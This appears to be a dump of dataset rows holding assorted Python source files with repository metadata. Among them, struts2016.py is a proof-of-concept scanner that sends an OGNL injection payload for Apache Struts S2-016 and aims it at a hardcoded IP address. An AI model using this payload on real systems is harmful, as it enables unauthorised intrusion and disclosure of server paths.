e2342cf62a0c93cdd44e45b46e6c6ee836e8d8c8
|
[] |
no_license
|
sunruihua0522/SIG-PyCode
|
70db0b57bbf9ce35dc42bd8de62c5bb56a2e888e
|
483a67bf679f54ab7405c2362d9cfe47daa2bc0f
|
refs/heads/master
| 2020-07-12T14:46:32.588227
| 2020-04-02T04:37:02
| 2020-04-02T04:37:02
| 204,842,675
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
from flask import Flask, Request
app =Flask(__name__)
@app.route('/')
def HelloWold():
return 'Hello World'
@app.route('/login/')
def Login():
return 'Login......'
@app.route('/login/<int:id>/')
def LoginWithVar(id):
return '<h1>Welcome %d to my world !</h1>'%id
@app.route("/foo/<string:username>/")
def foo(username):
return "loginSteing %s"%username
app.run(host ='0.0.0.0', port = 8080)
|
[
"--global"
] |
--global
|
71f98b5c6f7a6e09c70a177a86d013d601ea80b4
|
8f1137592d670ce134821106f736e231b03ead87
|
/mmdet/models/backbones/__init__.py
|
bed1d549993cacc78bc9d11bcb4b03efddd934ac
|
[
"MIT"
] |
permissive
|
mousecpn/DMC-Domain-Generalization-for-Underwater-Object-Detection
|
fa426c834fa2a5cd2fe98c50dd4dfeda64fcdc79
|
133797cfb7553557fb81a37e3c99c88154a13765
|
refs/heads/master
| 2023-05-23T16:49:34.795363
| 2023-02-13T02:23:31
| 2023-02-13T02:23:31
| 501,597,077
| 16
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,070
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from .csp_darknet import CSPDarknet
from .darknet import Darknet
from .detectors_resnet import DetectoRS_ResNet
from .detectors_resnext import DetectoRS_ResNeXt
from .hourglass import HourglassNet
from .hrnet import HRNet
from .mobilenet_v2 import MobileNetV2
from .pvt import PyramidVisionTransformer, PyramidVisionTransformerV2
from .regnet import RegNet
from .res2net import Res2Net
from .resnest import ResNeSt
from .resnet import ResNet, ResNetV1d
from .resnext import ResNeXt
from .ssd_vgg import SSDVGG
from .swin import SwinTransformer
from .trident_resnet import TridentResNet
from .hiddenMixupResnet1 import HiddenMixupResNet,ContrastiveHiddenMixupResNet
__all__ = [
'RegNet', 'ResNet', 'ResNetV1d', 'ResNeXt', 'SSDVGG', 'HRNet',
'MobileNetV2', 'Res2Net', 'HourglassNet', 'DetectoRS_ResNet',
'DetectoRS_ResNeXt', 'Darknet', 'ResNeSt', 'TridentResNet', 'CSPDarknet',
'SwinTransformer', 'PyramidVisionTransformer', 'PyramidVisionTransformerV2','ContrastiveHiddenMixupResNet','HiddenMixupResNet'
]
|
[
"609731730@qq.com"
] |
609731730@qq.com
|
9eb0eefa8a96b1ade59c85a7d02aab823056e1af
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/119/usersdata/239/27344/submittedfiles/al1.py
|
6c815196c1dc7bc1a3f761f112f9ee81f7fa36b9
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 298
|
py
|
# -*- coding: utf-8 -*-
print("Programa de conversão de temperatura: °C -> °F")#Nome de apresentação do aplicativo
print("")
C = float(input("Digite a temperatura em °C:"))#Declarando a entrada
F = ((9*C)+160)/5#Processamento
print("O valor em °F é: %.2f"%F)#Linha para apresentar a saída
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
b650ce40f2448c5bb65139c22519be4c58cbe7dc
|
2af9c17cf29a9bba3f3e714c861e8f89ee5fc488
|
/python code/HR33_itertools_product.py
|
f9633579a94bd1807b00e7a86ee8e8966bd4a1e5
|
[] |
no_license
|
Binay28/Binay-s_Code
|
9df3315bf9433d62a3b2228ea3f87be93917e5b3
|
7e05c39a753fab79a4518119d41953827dba10c9
|
refs/heads/master
| 2022-11-18T16:00:19.325948
| 2020-07-16T12:16:38
| 2020-07-16T12:16:38
| 198,006,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
from itertools import product
A=list(map(int,input().split()))
B=list(map(int,input().split()))
print(*product(A,B))
#product(A, B) returns the same as ((x,y) for x in A for y in B)
|
[
"45505267+Binay28@users.noreply.github.com"
] |
45505267+Binay28@users.noreply.github.com
|
548e6b996617ab7253f3a41fa7c7838b9df2aad1
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/qeyinsjZHCPEddbfe_3.py
|
101cca3e7846d04b82b150f8b95efd2e70cbf0e5
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
def dice_game(lst):
result = [0 if x == y else x + y for x, y in lst]
if 0 in result:
return 0
else:
return sum(result)
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
52d55eaa96a718f0192d07bd30328853a449ba83
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02419/s944531801.py
|
0470606a21cac3803c17734548ec73c240969efd
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
W=raw_input()
T=[]
while 1:
x=raw_input()
if x=="END_OF_TEXT": break
T+=[v.lower() for v in x.split()]
print T.count(W)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
f18e2900ad229eb69539225ff1271712780b26b1
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/Quote18/HQ_18_042.py
|
4520798521b4e456949b24bbd5c72a4af4a40a7b
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,258
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import time
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from log import *
class HQ_18_042(xtp_test_case):
def subMarketData(self, Api, stk_info, case_name, rs_expect):
print Api.GetApiVersion()
def on_market_data(data, error, last):
self.print_msg(case_name, rs_expect, error)
Api.setSubMarketDataHandle(on_market_data)
Api.SubscribeMarketData(stk_info)
time.sleep(1)
def print_msg(self, case_name, rs_expect, error):
if rs_expect == error:
logger.warning('{0}测试正确!'.format(case_name))
else:
logger.error('{0}测试错误!'.format(case_name))
self.assertEqual(error, rs_expect)
def test_HQ_18_042(self):
pyname = 'HQ_18_042'
client_id = 6
Api = XTPQuoteApi(client_id)
Api.Login()
stk_info = {'ticker': '', 'exchange_id': 1}
self.subMarketData(Api, stk_info, pyname,
{'error_id': 11200003, 'error_msg': 'unknown security'}) # 0
Api.Logout()
if __name__=='__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
c8e514cf6371ba34c6915c2a4fa7d98162c04ef5
|
387ad3775fad21d2d8ffa3c84683d9205b6e697d
|
/testsuite/trunk/epath/set_ep_loc_012.py
|
78a9160027aee4ca102953bb975b8d0cbcdb9901
|
[] |
no_license
|
kodiyalashetty/test_iot
|
916088ceecffc17d2b6a78d49f7ea0bbd0a6d0b7
|
0ae3c2ea6081778e1005c40a9a3f6d4404a08797
|
refs/heads/master
| 2020-03-22T11:53:21.204497
| 2018-03-09T01:43:41
| 2018-03-09T01:43:41
| 140,002,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,928
|
py
|
#!/usr/bin/env python
"""
(C) Copyright IBM Corp. 2008
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. This
file and program are licensed under a BSD style license. See
the Copying file included with the OpenHPI distribution for
full licensing terms.
Authors:
Suntrupth S Yadav <suntrupth@in.ibm.com>
"""
"""oh_set_ep_location: Dull entity path and victim element in the middle.
Only victim element's instance number changed. """
import unittest
from openhpi import *
class TestSequence(unittest.TestCase):
def runTest(self):
y = 77002
z = 3
i = 0
ep=SaHpiEntityPathT()
#SaHpiEntityTypeT
w = SAHPI_ENT_SBC_BLADE
#SaHpiEntityLocationT
x = 56873
for i in range(0,z):
ep.Entry[i].EntityType = w
ep.Entry[i].EntityLocation = y
i=i+1
ep.Entry[z].EntityType = SAHPI_ENT_FAN
ep.Entry[z].EntityLocation = z
for i in range(z+1, SAHPI_MAX_ENTITY_PATH):
ep.Entry[i].EntityType = w
ep.Entry[i].EntityLocation = y
i=i+1
err = oh_set_ep_location(ep, SAHPI_ENT_FAN, x)
self.assertEqual (err!=None,True)
self.assertEqual (ep.Entry[z].EntityLocation != x,False)
self.assertEqual (ep.Entry[z].EntityType != SAHPI_ENT_FAN,False)
for i in range ( 0,z ):
self.assertEqual ((ep.Entry[i].EntityType != w) or
(ep.Entry[i].EntityLocation != y),False)
i=i+1
for i in range ( z+1, SAHPI_MAX_ENTITY_PATH):
self.assertEqual ((ep.Entry[i].EntityType != w) or
(ep.Entry[i].EntityLocation != y),False)
if __name__=='__main__':
unittest.main()
|
[
"suntrupth@a44bbd40-eb13-0410-a9b2-f80f2f72fa26"
] |
suntrupth@a44bbd40-eb13-0410-a9b2-f80f2f72fa26
|
b257b9fbad4c6e99eb47fc7e4b63508036ae8fe7
|
6257b3d146ecff251aabb4dc78cf66bc69d2ab31
|
/component/struts/struts2016.py
|
980725069fe7fafe8cd96a756da7fe407fcc2015
|
[
"MIT"
] |
permissive
|
bigbigx/PocCollect
|
39549107f01d313656b451bafe7657cb8c61f410
|
6b0f438e6e6005bd0adbdf3bcc97a2d808c6f9ea
|
refs/heads/master
| 2021-06-04T15:48:04.790219
| 2021-04-06T11:24:54
| 2021-04-06T11:24:54
| 63,687,713
| 0
| 0
|
MIT
| 2021-04-06T11:24:55
| 2016-07-19T11:19:43
|
Python
|
UTF-8
|
Python
| false
| false
| 2,355
|
py
|
#!/usr/bin/env python
# encoding: utf-8
from t import T
import requests
class P(T):
def __init__(self):
T.__init__(self)
keywords=['struts']
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url=''
target_url = 'http://' + ip + ':' + port
if productname.get('path',''):
target_url = 'http://'+ip+':'+port+productname.get('path','')
else:
from script import linktool
listarray=linktool.getaction(target_url)
if len(listarray)>0:
target_url=listarray[0]
else:
target_url = 'http://'+ip+':'+port+'/login.action'
result = {}
timeout=3
result['result']=False
res=None
payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
print target_url
try:
headers = {"Content-Type":"application/x-www-form-urlencoded"}
r = requests.post(target_url,data=payload,headers=headers,timeout=5)
res_html = r.text
except Exception,e:
print e
return result
finally:
if res is not None:
res.close()
del res
if res_html.find("88888887") <> -1:
info = target_url + "struts016 Vul"
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='struts016 Vul'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=payload
result['VerifyInfo']['result'] =info
return result
return result
if __name__ == '__main__':
print P().verify(ip='116.213.171.228',port='80')
|
[
"nanshihui@qq.com"
] |
nanshihui@qq.com
|
8110ddd0dde5af6e6d8fb80a917983c1ae137518
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/hoxv8zaQJNMWJqnt3_1.py
|
111f3aa56f45f561eaf1e5c385c12cc977867642
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 159
|
py
|
def is_heteromecic(n,i = 0):
if n == i * (i + 1):
return True
if n < i * (i +1):
return False
i+=1
return is_heteromecic(n, i)
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.